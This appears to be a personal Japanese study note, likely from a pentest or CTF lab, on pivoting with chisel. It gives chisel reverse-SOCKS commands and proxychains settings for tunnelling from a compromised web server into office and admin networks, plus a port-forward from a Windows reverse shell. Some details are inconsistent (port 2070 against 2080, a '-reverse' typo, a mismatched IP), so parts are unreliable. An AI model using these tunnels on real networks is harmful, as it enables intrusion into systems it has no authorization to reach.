Pivoting with chisel
〜設定〜
https://scrapbox.io/files/63c4e899e1d516001d130c2d.png
アタッカはwebサーバ10.10.101.50をのっとってる
(Office Network DC: 172.16.1.5, Admin Network DC: 172.16.2.10)
〜まずはwebサーバー上でchiselクライアントを〜
code:アタッカー上
./chisel server -p 8001 --reverse
アタッカーの/etc/proxychains.confに次を追記する:
code:/etc/proxychains.conf
socks5 127.0.0.1 1080
<- これ、"socks4" とかにするとうまくいかないかも
code:webサーバ上
./chisel client 10.10.101.51:8001 R:1080:socks
(-> これがリバースプロキシ。アタッカーマシンの1080ポートをオープン)
-> 次のようにしてOffice network内をenumできる:
code:attack_from_attacker
proxychains4 nmap 172.16.1.1/24
〜office network 上の172.16.1.5にアクセスするために〜
webサーバ上で同じようにすればよい。今度はwebサーバ上でchiselサーバを起動する。
code:webサーバ上
./chisel server -p 8002 --reverse
172.16.1.5(Adminnetwork上のPCとつながってるPC)上でchiselクライアント:
code:172.16.1.5上
./chisel client 172.16.1.101:8002 R:2080:socks
この為に追記する:
code:/etc/proxychains.conf
socks5 127.0.0.1 2070
-> 以上でアタッカー(10.10.101.51)から172.16.1.5につながれるようになった
https://scrapbox.io/files/63c4e8d85d9755001e02c2db.png
〜Admin Network 上の172.16.2.10にアクセスするために〜
172.16.1.5(Office Network DC)上でclientサーバをたてる
code:172.16.1.5上
./chisel server -p 8003 -reverse
172.16.1.10(Admin Network DC)上でchiselクライアント
code:172.16.1.10上
./chisel client 172.16.1.5:8003 R:3080:socks
このために追記:
code:/etc/prosychains.conf
socks5 127.0.0.1 3080
https://scrapbox.io/files/63c4e8e4869f3b001e19dd43.png
(例)ターゲット(10.10.10.154)のport910を、Kali(10.10.16.15)のport 1234にする
code:Kali
└─$ chisel server --reverse --port 4242
code:Windows(revshell)
C:\Users\Cortin> .\chisel.exe client 10.10.16.15:4242 R:1234:127.0.0.1:910
-> listen on Kali 1234, foward to localhost port 910 と表現